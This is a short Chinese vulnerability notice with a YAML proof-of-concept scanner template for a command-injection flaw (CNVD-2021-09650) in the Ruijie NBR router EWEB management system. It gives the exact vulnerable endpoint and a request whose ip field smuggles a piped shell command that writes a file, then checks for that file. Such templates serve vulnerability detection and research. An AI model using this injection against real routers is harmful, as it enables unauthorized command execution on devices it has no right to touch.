漏洞描述
app="Ruijie-EWEB网管系统"
CNVD-2021-09650: 锐捷NBR路由器EWEB网管系统存在命令执行漏洞
PoC代码[已公开]
id: CNVD-2021-09650
info:
name: 锐捷NBR路由器EWEB网管系统存在命令执行漏洞
author: alexto
severity: critical
description: |
app="Ruijie-EWEB网管系统"
reference:
- https://xz.aliyun.com/t/9016?page=1
- https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
tags: cnvd,cnvd2021,ruijie,rce
created: 2021/04/22
set:
payload: randomLowercase(20)
randstr: randomLowercase(10)
rules:
r0:
request:
method: POST
path: /guest_auth/guestIsUp.php
body: |
mac=1&ip=127.0.0.1|echo '{{payload}}' > {{randstr}}.txt
expression: response.status == 200
r1:
request:
method: GET
path: /guest_auth/{{randstr}}.txt
expression: response.status == 200 && response.body.bcontains(bytes(payload))
expression: r0() && r1()